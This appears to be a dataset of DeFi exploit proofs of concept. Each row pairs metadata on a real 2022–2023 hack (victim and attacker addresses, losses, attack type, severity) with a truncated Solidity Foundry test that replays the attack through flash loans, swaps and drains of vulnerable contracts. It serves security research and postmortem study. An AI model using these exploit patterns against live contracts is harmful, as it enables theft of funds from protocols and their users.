// TX::https://app.blocksec.com/explorer/tx/bsc/0x7260ad0e4769ae68f0a680356c63140353c18d7be1b86a8c4e99a0fc3b6842c1
// GUY : https://x.com/MetaSec_xyz/status/1729323254610002277
// Profit : ~59 USD... | exploit_poc | FiberRouter | 2023-11 | FiberRouter_exp.sol | null | ecb1bb6964e50558 | 2026-01-07T10:59:16.536880 | postmortems | unknown | 33,874,498 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function attack() public {
emit log_named_decimal_uint("[Begin] Attacker USDT before exploit", usdc.balanceOf(address(victim)), 18);
uint256 victim_balance = usdc.balanceOf(address(victim));
wbnb.approve(address(pancakeRouter), 99_999 ether);
address[] memory swapPath = new address[](2);... | true | Unknown | 3.47 | low | FiberRouter Exploit (2023-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~31,354 USD$
// Attacker : https://bscscan.com/tx/0xb29f18b89e56cc0151c7c17de0625a21018d8ae7
// Attack Contract : https://bscscan.com/address/0x783fbea45b32eaaa596b4441... | exploit_poc | 3913 | 2023-11 | 3913_exp.sol | flash_loan | fa737e928f3a2a05 | 2026-01-07T10:59:16.536927 | postmortems | bsc | 33,132,467 | ~31,354 USD$ | 31 | https://bscscan.com/tx/0xb29f18b89e56cc0151c7c17de0625a21018d8ae7 | https://bscscan.com/address/0x783fbea45b32eaaa596b44412041dd1208025e83 | null | null | null | null | true | true | true | low | ~31,354 USD$ | flash-loan | function testExploit() public {
deal(address(busd), address(this), 0);
emit log_named_decimal_uint(
"attacker balance busd before attack:", busd.balanceOf(address(this)), busd.decimals()
);
dodo1FlashLoanAmount = busd.balanceOf(dodo1);
IDodo(dodo1).flashLoan(0, dodo1F... | true | https://bscscan.com/tx/0xb29f18b89e56cc0151c7c17de0625a21018d8ae7 | https://bscscan.com/address/0x783fbea45b32eaaa596b44412041dd1208025e83 | $31 | 8 | high | 3913 Exploit (2023-11) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : Unclear
// Attacker : https://bscscan.com/address/0xddaaedcf226729def824cc5c14382c5980844d1f
// Attack Contract : https://bscscan.com/address/0x9d0d28f7b9a9e6d55abb9e41a8... | exploit_poc | EHX | 2023-11 | EHX_exp.sol | flash_loan | b401518df388d8fa | 2026-01-07T10:59:16.536987 | postmortems | bsc | null | Unclear | null | https://bscscan.com/address/0xddaaedcf226729def824cc5c14382c5980844d1f | https://bscscan.com/address/0x9d0d28f7b9a9e6d55abb9e41a87df133f316c68c | https://bscscan.com/address/0xe1747a23c44f445062078e3c528c9f4c28c50a51 | https://app.blocksec.com/explorer/tx/bsc/0x8b528372b743b4b8c4eb0904c96529482653187c19e13afaa22f3ba4e08fbfbb | null | https://x.com/MetaSec_xyz/status/1724691996638618086 | true | true | true | medium | Unclear | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals()
);
DPPOracle.flashLoan(flashAmountWBNB, 0, address(this), bytes("_"));
emit log_named_decimal_uint(
"Exploiter WBN... | true | Unclear | https://bscscan.com/address/0xddaaedcf226729def824cc5c14382c5980844d1f | https://bscscan.com/address/0x9d0d28f7b9a9e6d55abb9e41a87df133f316c68c | https://bscscan.com/address/0xe1747a23c44f445062078e3c528c9f4c28c50a51 | https://app.blocksec.com/explorer/tx/bsc/0x8b528372b743b4b8c4eb0904c96529482653187c19e13afaa22f3ba4e08fbfbb | https://x.com/MetaSec_xyz/status/1724691996638618086 | Unknown | 7.77 | medium | EHX Exploit (2023-11) | false | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$155K
// Attacker : https://bscscan.com/address/0x1a7b15354e2f6564fcf6960c79542de251ce0dc9
// Attack Contract : https://bscscan.com/address/0x1694d7fabf3b28f11d65deeb9f... | exploit_poc | TrustPad | 2023-11 | TrustPad_exp.sol | null | 9fa3070198aa12d9 | 2026-01-07T10:59:16.537051 | postmortems | bsc | 33,260,104 | ~$155K | 155,000 | https://bscscan.com/address/0x1a7b15354e2f6564fcf6960c79542de251ce0dc9 | https://bscscan.com/address/0x1694d7fabf3b28f11d65deeb9f60810daa26909a | null | https://explorer.phalcon.xyz/tx/bsc/0x191a34e6c0780c3d1ab5c9bc04948e231d742b7d88e0e4f85568d57fcdc03182 | null | null | true | true | false | high | ~$155K | unknown | function testExploit() public {
deal(address(this), 0.02 ether);
// Getting TPAD amount
WBNBToTPAD();
// Jump to time when attack was happened
vm.roll(33_260_391);
uint256 startBalanceTPAD = TPAD.balanceOf(address(this));
// Approve all DDD tokens from original e... | true | ~$155K | https://bscscan.com/address/0x1a7b15354e2f6564fcf6960c79542de251ce0dc9 | https://bscscan.com/address/0x1694d7fabf3b28f11d65deeb9f60810daa26909a | https://explorer.phalcon.xyz/tx/bsc/0x191a34e6c0780c3d1ab5c9bc04948e231d742b7d88e0e4f85568d57fcdc03182 | $155.0K | 8 | high | TrustPad Exploit (2023-11) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~20K USD$
// Attacker : https://etherscan.io/address/0x0ec330df28ae6106a774d0add3e540ea8d226e3b
// Attack Contract : https://etherscan.io/address/0xf5836e292f716a7979f9b... | exploit_poc | MahaLend | 2023-11 | MahaLend_exp.sol | flash_loan | 2d19775d4c8c6f80 | 2026-01-07T10:59:16.537112 | postmortems | ethereum | 18,544,604 | ~20K USD$ | 20,000 | https://etherscan.io/address/0x0ec330df28ae6106a774d0add3e540ea8d226e3b | https://etherscan.io/address/0xf5836e292f716a7979f9bc5c2d3ed59913e07962 | https://etherscan.io/address/0xfd11aba71c06061f446ade4eec057179f19c23c4 | https://etherscan.io/tx/0x2881e839d4d562fad5356183e4f6a9d427ba6f475614ce8ef64dbfe557a4a2cc | null | https://twitter.com/Phalcon_xyz/status/1723223766350832071 | true | true | true | medium | ~20K USD$ | flash-loan | false | ~20K USD$ | https://etherscan.io/address/0x0ec330df28ae6106a774d0add3e540ea8d226e3b | https://etherscan.io/address/0xf5836e292f716a7979f9bc5c2d3ed59913e07962 | https://etherscan.io/address/0xfd11aba71c06061f446ade4eec057179f19c23c4 | https://etherscan.io/tx/0x2881e839d4d562fad5356183e4f6a9d427ba6f475614ce8ef64dbfe557a4a2cc | https://twitter.com/Phalcon_xyz/status/1723223766350832071 | $20.0K | 7.49 | medium | MahaLend Exploit (2023-11) | true | true | true | false | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~19K USD$
// Attacker - https://etherscan.io/address/0x2F746bC70f72aAF3340B8BbFd254fd91a3996218
// Attack contract - https://etherscan.io/address/0x85301f7b943fd132c8dbc33f8fd9d77109a84f28
// Attack Tx : http... | exploit_poc | TheNFTV2 | 2023-11 | TheNFTV2_exp.sol | null | f8e269582f0e80e0 | 2026-01-07T10:59:16.537172 | postmortems | ethereum | 18,647,450 | ~19K USD$ | 19,000 | null | null | null | https://etherscan.io/tx/0xd5b4d68432cbbd912130bbb5b93399031ddbb400d8f723c78050574de7533106 | null | null | true | true | false | medium | ~19K USD$ | unknown | function test() public {
address[] memory assets = new address[](1);
assets[0] = address(WETH);
uint256[] memory amounts = new uint256[](1);
amounts[0] = 80_000 * 1e18;
uint256[] memory modes = new uint256[](1);
modes[0] = 0;
emit log_named_decimal_uint("[Start] ... | true | ~19K USD$ | https://etherscan.io/tx/0xd5b4d68432cbbd912130bbb5b93399031ddbb400d8f723c78050574de7533106 | $19.0K | 6.72 | medium | TheNFTV2 Exploit (2023-11) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost : ~$31K
// Attacker : https://bscscan.com/address/0xb9bdc2537c6f4b587a5c81a67e7e3a4e6ddda189
// Attack Contract : https://bscscan.com/address/0xda148143379ae54e06d2429a5c80b19d4a9d6734
// Vulnerable C... | exploit_poc | ShibaToken | 2023-11 | ShibaToken_exp.sol | flash_loan | 1192fa0d7242785d | 2026-01-07T10:59:16.537221 | postmortems | bsc | 33,528,882 | ~$31K | 31,000 | https://bscscan.com/address/0xb9bdc2537c6f4b587a5c81a67e7e3a4e6ddda189 | https://bscscan.com/address/0xda148143379ae54e06d2429a5c80b19d4a9d6734 | https://bscscan.com/address/0x13b1f2e227ca6f8e08ac80368fd637f5084f10a5 | https://explorer.phalcon.xyz/tx/bsc/0x75a26224da9faf37c2b3a4a634a096af7fec561f631a02c93e11e4a19d159477 | null | null | true | false | true | medium | ~$31K | flash-loan | function test() public {
// vm.prank(0xb9bdc2537C6F4B587A5C81A67e7e3a4e6dDDa189, 0xb9bdc2537C6F4B587A5C81A67e7e3a4e6dDDa189);
claim(20);
} | true | ~$31K | https://bscscan.com/address/0xb9bdc2537c6f4b587a5c81a67e7e3a4e6ddda189 | https://bscscan.com/address/0xda148143379ae54e06d2429a5c80b19d4a9d6734 | https://bscscan.com/address/0x13b1f2e227ca6f8e08ac80368fd637f5084f10a5 | https://explorer.phalcon.xyz/tx/bsc/0x75a26224da9faf37c2b3a4a634a096af7fec561f631a02c93e11e4a19d159477 | $31.0K | 10 | high | ShibaToken Exploit (2023-11) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~26 ETH
// Attacker : https://etherscan.io/address/0x864e656c57a5a119f332c47326a35422294db5c9
// Attack Contract : https://etherscan.io/address/0x03e7b13bcd9b8383f403696... | exploit_poc | grok | 2023-11 | grok_exp.sol | null | 049dc3944acc3676 | 2026-01-07T10:59:16.537288 | postmortems | ethereum | 18,538,679 | ~26 ETH | 26 | https://etherscan.io/address/0x864e656c57a5a119f332c47326a35422294db5c9 | https://etherscan.io/address/0x03e7b13bcd9b8383f403696c1494845560607eca | null | https://explorer.phalcon.xyz/tx/eth/0x3e9bcee951cdad84805e0c82d2a1e982e71f2ec301a1cbd344c832e0acaee813?line=136 | null | null | true | true | false | low | ~26 ETH | unknown | function testExpolit() public {
emit log_named_decimal_uint("attaker balance before attack:", weth.balanceOf(address(this)), weth.decimals());
wethpair.flash(address(this), 0, 30_000_000_000_000_000_000, new bytes(1));
emit log_named_decimal_uint("attaker balance after attack:", weth.balanceOf(a... | true | ~26 ETH | https://etherscan.io/address/0x864e656c57a5a119f332c47326a35422294db5c9 | https://etherscan.io/address/0x03e7b13bcd9b8383f403696c1494845560607eca | https://explorer.phalcon.xyz/tx/eth/0x3e9bcee951cdad84805e0c82d2a1e982e71f2ec301a1cbd344c832e0acaee813?line=136 | $26 | 6.97 | medium | grok Exploit (2023-11) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$2M
// Attacker : https://etherscan.io/address/0x085bdff2c522e8637d4154039db8746bb8642bff
// Attack Contract : https://etherscan.io/address/0x526e8e98356194b64eae4c2d44... | exploit_poc | OnyxProtocol | 2023-11 | OnyxProtocol_exp.sol | flash_loan | 5a827c91e3f3ba47 | 2026-01-07T10:59:16.537346 | postmortems | ethereum | 18,476,512 | ~$2M | 2,000,000 | https://etherscan.io/address/0x085bdff2c522e8637d4154039db8746bb8642bff | https://etherscan.io/address/0x526e8e98356194b64eae4c2d443cc8aad367336f | null | https://explorer.phalcon.xyz/tx/eth/0xf7c21600452939a81b599017ee24ee0dfd92aaaccd0a55d02819a7658a6ef635 | null | null | true | true | true | critical | ~$2M | flash-loan | function testExploit() public {
deal(address(this), 0 ether);
deal(address(WETH), address(this), 0);
emit log_named_decimal_uint("Attacker WETH balance before exploit", WETH.balanceOf(address(this)), 18);
AaveV3.flashLoanSimple(address(this), address(WETH), 4000 * 1e18, bytes(""), 0);
... | true | ~$2M | https://etherscan.io/address/0x085bdff2c522e8637d4154039db8746bb8642bff | https://etherscan.io/address/0x526e8e98356194b64eae4c2d443cc8aad367336f | https://explorer.phalcon.xyz/tx/eth/0xf7c21600452939a81b599017ee24ee0dfd92aaaccd0a55d02819a7658a6ef635 | $2.00M | 9 | high | OnyxProtocol Exploit (2023-11) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$365K
// Attacker : https://bscscan.com/address/0x69e068eb917115ed103278b812ec7541f021cea0
// Attack Contract : https://bscscan.com/address/0x3918e0d26b41134c006e8d2d7e... | exploit_poc | MEV_0x8c2d | 2023-11 | MEV_0x8c2d_exp.sol | null | f15973151ed78582 | 2026-01-07T10:59:16.537435 | postmortems | bsc | 33,435,892 | ~$365K | 365,000 | https://bscscan.com/address/0x69e068eb917115ed103278b812ec7541f021cea0 | https://bscscan.com/address/0x3918e0d26b41134c006e8d2d7e3206a53b006108 | null | https://explorer.phalcon.xyz/tx/bsc/0x3dcb26a1f49eb4d02ca29960b4833bfb2e83d7b5d9591aed1204168944c8c9b3 | null | null | true | true | false | high | ~$365K | unknown | function testExploit() public {
deal(address(BUSDT), address(this), 0);
bytes memory data = abi.encode(assetHarvestingContract, victimMevBot);
WBNB_BUSDT.swap(BUSDT.balanceOf(victimMevBot), 0, address(this), data);
} | true | ~$365K | https://bscscan.com/address/0x69e068eb917115ed103278b812ec7541f021cea0 | https://bscscan.com/address/0x3918e0d26b41134c006e8d2d7e3206a53b006108 | https://explorer.phalcon.xyz/tx/bsc/0x3dcb26a1f49eb4d02ca29960b4833bfb2e83d7b5d9591aed1204168944c8c9b3 | $365.0K | 6.97 | medium | MEV_0x8c2d Exploit (2023-11) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$2M
// Attacker : https://etherscan.io/address/0x46d9b3dfbc163465ca9e306487cba60bc438f5a2
// Attack Contract : https://etherscan.io/address/0xeadf72fd4733665854c76926f4... | exploit_poc | bot | 2023-11 | bot_exp.sol | flash_loan | c0756aed3f045ab7 | 2026-01-07T10:59:16.537484 | postmortems | ethereum | 18,523,344 | ~$2M | 2,000,000 | https://etherscan.io/address/0x46d9b3dfbc163465ca9e306487cba60bc438f5a2 | https://etherscan.io/address/0xeadf72fd4733665854c76926f4473389ff1b78b1 | null | https://explorer.phalcon.xyz/tx/eth/0xbc08860cd0a08289c41033bdc84b2bb2b0c54a51ceae59620ed9904384287a38 | null | null | true | true | true | critical | ~$2M | flash-loan | function testExpolit() public {
emit log_named_decimal_uint("attacker balance before attack", weth.balanceOf(address(this)), weth.decimals());
aave.flashLoanSimple(address(this), address(weth), 27_255_000_000_000_000_000_000, new bytes(1), 0);
emit log_named_decimal_uint("attacker balance after... | true | ~$2M | https://etherscan.io/address/0x46d9b3dfbc163465ca9e306487cba60bc438f5a2 | https://etherscan.io/address/0xeadf72fd4733665854c76926f4473389ff1b78b1 | https://explorer.phalcon.xyz/tx/eth/0xbc08860cd0a08289c41033bdc84b2bb2b0c54a51ceae59620ed9904384287a38 | $2.00M | 8.24 | high | bot Exploit (2023-11) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~3.2 M USD$
// Attacker : https://etherscan.io/address/0xc1f2b71a502b551a65eee9c96318afdd5fd439fa
// Attack Contract : https://etherscan.io/address/0x0a3340129816a86b62b... | exploit_poc | Raft | 2023-11 | Raft_exp.sol | flash_loan | 3f5ed219e7f2d33c | 2026-01-07T10:59:16.537538 | postmortems | ethereum | 18,543,485 | ~3.2 M USD$ | 3,200,000 | https://etherscan.io/address/0xc1f2b71a502b551a65eee9c96318afdd5fd439fa | https://etherscan.io/address/0x0a3340129816a86b62b7eafd61427f743c315ef8 | https://etherscan.io/address/0x9ab6b21cdf116f611110b048987e58894786c244 | https://etherscan.io/tx/0xfeedbf51b4e2338e38171f6e19501327294ab1907ab44cfd2d7e7336c975ace7 | null | https://twitter.com/BlockSecTeam/status/1723229393529835972 | true | true | true | critical | ~3.2 M USD$ | flash-loan | false | ~3.2 M USD$ | https://etherscan.io/address/0xc1f2b71a502b551a65eee9c96318afdd5fd439fa | https://etherscan.io/address/0x0a3340129816a86b62b7eafd61427f743c315ef8 | https://etherscan.io/address/0x9ab6b21cdf116f611110b048987e58894786c244 | https://etherscan.io/tx/0xfeedbf51b4e2338e38171f6e19501327294ab1907ab44cfd2d7e7336c975ace7 | https://twitter.com/BlockSecTeam/status/1723229393529835972 | $3.20M | 8 | high | Raft Exploit (2023-11) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : Unclear
// Attacker : https://bscscan.com/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
// Attack Contract : https://bscscan.com/address/0x7b11ae85f73b7ee6aa84cc9143... | exploit_poc | XAI | 2023-11 | XAI_exp.sol | flash_loan | 04bae15b2b011fe3 | 2026-01-07T10:59:16.537602 | postmortems | bsc | null | Unclear | null | https://bscscan.com/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba | https://bscscan.com/address/0x7b11ae85f73b7ee6aa84cc91430581bd952d9ffa | https://bscscan.com/address/0x570ce7b89c67200721406525e1848bca6ff5a6f3 | https://app.blocksec.com/explorer/tx/bsc/0x2b251e456c434992b9ac7ec56dc166550c4cd7db3adefbf7eb3ab91cef55f9bf | null | https://x.com/MetaSec_xyz/status/1724683082064855455 | true | true | true | medium | Unclear | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals()
);
XAI.approve(address(PancakeRouter), type(uint256).max);
DPPOracle.flashLoan(WBNB.balanceOf(address(DPPOracle)), 0, address(t... | true | Unclear | https://bscscan.com/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba | https://bscscan.com/address/0x7b11ae85f73b7ee6aa84cc91430581bd952d9ffa | https://bscscan.com/address/0x570ce7b89c67200721406525e1848bca6ff5a6f3 | https://app.blocksec.com/explorer/tx/bsc/0x2b251e456c434992b9ac7ec56dc166550c4cd7db3adefbf7eb3ab91cef55f9bf | https://x.com/MetaSec_xyz/status/1724683082064855455 | Unknown | 7.67 | medium | XAI Exploit (2023-11) | false | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/AnciliaInc/status/1599599614490877952
// @TX
// https://bscscan.com/tx/0xac57c78881a7c00dfbac0563e21b5ae3a8e3f9d1b07198a27313722a166cc0a3
contract ContractTest... | exploit_poc | BBOX | 2022-12 | BBOX_exp.sol | flash_loan | 24422e0327dfda85 | 2026-01-07T10:59:16.537642 | postmortems | bsc | 23,106,506 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
WBNB.approve(address(Router), type(uint256).max);
BBOX.approve(address(Router), type(uint256).max);
TransferBBOXHelp transferHelp = new TransferBBOXHelp(); // sell time limit
contractAddress = address(transferHelp);
flashLoanAmount = WBNB.balanceOf... | true | Unknown | 4.26 | low | BBOX Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/SolidityFinance/status/1601684150456438784
// https://blog.lodestarfinance.io/post-mortem-summary-13f5fe0bb336
// @TX
// https://arbiscan.io/tx/0xc523c6307b025e... | exploit_poc | Lodestar | 2022-12 | Lodestar_exp.sol | flash_loan | 2e3df3ec79ac1117 | 2026-01-07T10:59:16.537693 | postmortems | arbitrum | 45,121,903 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 4 | low | Lodestar Exploit (2022-12) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~1300 $USDC
// Attacker : https://etherscan.io/address/0xb61e7f192a9ad5d11e2452f53d0ddf91b58239dc
// Attack Contract : https://etherscan.io/address/0x0757d02596ef9840048def00eeb8e0f3862cc7ca
// Vulnerable Contract : https://ethe... | exploit_poc | MEVbot_0x28d9 | 2022-12 | MEVbot_0x28d9_exp.sol | flash_loan | 6c648f81cb7f1754 | 2026-01-07T10:59:16.537770 | postmortems | ethereum | 16,157,843 | ~1300 $USDC | 1,300 | https://etherscan.io/address/0xb61e7f192a9ad5d11e2452f53d0ddf91b58239dc | https://etherscan.io/address/0x0757d02596ef9840048def00eeb8e0f3862cc7ca | https://etherscan.io/address/0x28d949fdfb5d9ea6b604fa6fee3d6548ea779f17 | https://etherscan.io/tx/0x313d23bdd9277717e3088f32c976479c09d4b8a94d5d94deb835d157fd0850ce | null | null | true | false | true | low | ~1300 $USDC | flash-loan | function testExploit() public {
emit log_named_decimal_uint("Attacker USDC balance before attack", USDC.balanceOf(address(this)), 6);
bytes memory data = abi.encode(address(this), 16_777_120 * 110 / 100, 0, 0);
while (USDT.balanceOf(MevBot_addr) > 20 * 1e6) {
DODO.flashLoan(0, 16_777... | true | ~1300 $USDC | https://etherscan.io/address/0xb61e7f192a9ad5d11e2452f53d0ddf91b58239dc | https://etherscan.io/address/0x0757d02596ef9840048def00eeb8e0f3862cc7ca | https://etherscan.io/address/0x28d949fdfb5d9ea6b604fa6fee3d6548ea779f17 | https://etherscan.io/tx/0x313d23bdd9277717e3088f32c976479c09d4b8a94d5d94deb835d157fd0850ce | $1.3K | 7.95 | medium | MEVbot_0x28d9 Exploit (2022-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$29k
// Attacker : https://bscscan.com/address/0xE3104e645BC3f6fD821930a6a39EE509a0E87D3b
// Attack Contract :
// https://bscscan.com/address/0xe3293F89FD3B9336Ac2d514E... | exploit_poc | FPR | 2022-12 | FPR_exp.sol | null | 6ee31ba08b38d827 | 2026-01-07T10:59:16.537816 | postmortems | bsc | 23,904,152 | ~$29k | 29,000 | https://bscscan.com/address/0xE3104e645BC3f6fD821930a6a39EE509a0E87D3b | null | null | null | null | null | true | true | false | medium | ~$29k | unknown | function testExploit() public {
FPR.approve(address(router), type(uint256).max);
IERC20(address(pair)).approve(address(router), type(uint256).max);
address[] memory path = new address[](2);
path[0] = address(FPR);
path[1] = address(USDT);
for (uint256 i = 0; i < 3; i++) {... | true | ~$29k | https://bscscan.com/address/0xE3104e645BC3f6fD821930a6a39EE509a0E87D3b | $29.0K | 5.59 | medium | FPR Exploit (2022-12) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1600442137811689473
// https://twitter.com/peckshield/status/1600418002163625984
// @TX
// https://bscscan.com/tx/0xca4d0d24aa448329b7d4eb81... | exploit_poc | AES | 2022-12 | AES_exp.sol | flash_loan | 6b85507c22b0b218 | 2026-01-07T10:59:16.537861 | postmortems | bsc | 23,695,904 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
USDT.approve(address(Router), type(uint256).max);
AES.approve(address(Router), type(uint256).max);
DVM(dodo).flashLoan(0, 100_000 * 1e18, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT.balanceOf... | true | Unknown | 4.22 | low | AES Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1606993118901198849
// https://twitter.com/peckshield/status/1606937055761952770
// @TX
// https://etherscan.io/tx/0x9a97d85642f956ad7a6b852... | exploit_poc | Rubic | 2022-12 | Rubic_exp.sol | null | 2d185816a38a1f51 | 2026-01-07T10:59:16.537911 | postmortems | ethereum | 16,260,580 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 2.82 | low | Rubic Exploit (2022-12) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1602335214356660225
// @TX
// https://bscscan.com/tx/0xea108fe94bfc9a71bb3e4dee4a1b0fd47572e6ad6aba8b2155ac44861be628ae
interface ERCPorxy ... | exploit_poc | BGLD | 2022-12 | BGLD_exp.sol | flash_loan | 2efb67880fced861 | 2026-01-07T10:59:16.537964 | postmortems | bsc | 23,844,529 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
oldBGLD.approve(address(Router), type(uint256).max);
oldBGLD.approve(address(Proxy), type(uint256).max);
newBGLD.approve(address(Router), type(uint256).max);
DEBT.approve(address(Router), type(uint256).max);
DVM(dodo).flashLoan(125 * 1e18, 0, addre... | true | Unknown | 5.53 | medium | BGLD Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://quillaudits.medium.com/decoding-elastic-swaps-850k-exploit-quillaudits-9ceb7fcd8d1a
// @Tx
// https://etherscan.io/tx/0xb36486f032a450782d5d2fac118ea90a6d3b08cac3409d949c59... | exploit_poc | ElasticSwap | 2022-12 | ElasticSwap_exp.sol | null | d58046301c0e9d6b | 2026-01-07T10:59:16.538021 | postmortems | ethereum | 23,563,709 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
TIC.approve(address(ELP), type(uint256).max);
USDC_E.approve(address(ELP), type(uint256).max);
ELP.approve(address(ELP), type(uint256).max);
SPair.swap(51_112 * 1e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint(
"Attac... | true | Unknown | 4.11 | low | ElasticSwap Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1598262002010378241
// @TX
// https://bscscan.com/tx/0xbcaecea2044101c80f186ce5327bec796cd9e054f0c240ddce93e2aead337370 first attack
// http... | exploit_poc | APC | 2022-12 | APC_exp.sol | flash_loan | d4f5683479a0d7fb | 2026-01-07T10:59:16.538071 | postmortems | bsc | 23,527,906 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
APC.approve(address(Router), type(uint256).max);
APC.approve(address(transSwap), type(uint256).max);
USDT.approve(address(Router), type(uint256).max);
MUSD.approve(address(transSwap), type(uint256).max);
DVM(dodo).flashLoan(0, 500_000 * 1e18, addre... | true | Unknown | 4.44 | low | APC Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1598704809690877952
// @Address
// https://snowtrace.io/address/0xfe2c4cb637830b3f1cdc626b99f31b1ff4842e2c
interface JoeRouter {
function... | exploit_poc | Overnight | 2022-12 | Overnight_exp.sol | flash_loan | f9fa717636540c2e | 2026-01-07T10:59:16.538122 | postmortems | avalanche | 23,097,846 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public payable {
amountBuy = 36_000_000_000;
address[] memory path = new address[](2);
path[0] = address(WAVAX);
path[1] = address(USDC);
Router.swapAVAXForExactTokens{value: 2830 ether}(amountBuy, path, address(this), block.timestamp);
uint256 bef... | true | Unknown | 6 | medium | Overnight Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1602877048124735489
// @TX
// https://bscscan.com/tx/0x7d2d8d2cda2d81529e0e0af90c4bfb39b6e74fa363c60b031d719dd9d153b012
// https://bscscan.c... | exploit_poc | Nmbplatform | 2022-12 | Nmbplatform_exp.sol | flash_loan | c205e4a256b1739e | 2026-01-07T10:59:16.538203 | postmortems | bsc | 23,639,507 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
user1 = new User1();
user2 = new User2();
user3 = new User3();
NBU_WBNB.deposit{value: 20 ether}();
NBU_WBNB.transfer(address(user1), 16 ether);
NBU_WBNB.transfer(address(user2), 2 ether);
NBU_WBNB.transfer(address(user3), 2 ether);... | true | Unknown | 6 | medium | Nmbplatform Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BeosinAlert/status/1601168659585454081
// @TX
// https://bscscan.com/tx/0xf743dba906255cf6f75f8243ef8192f2a211aacf03df99322584686b5c445c23
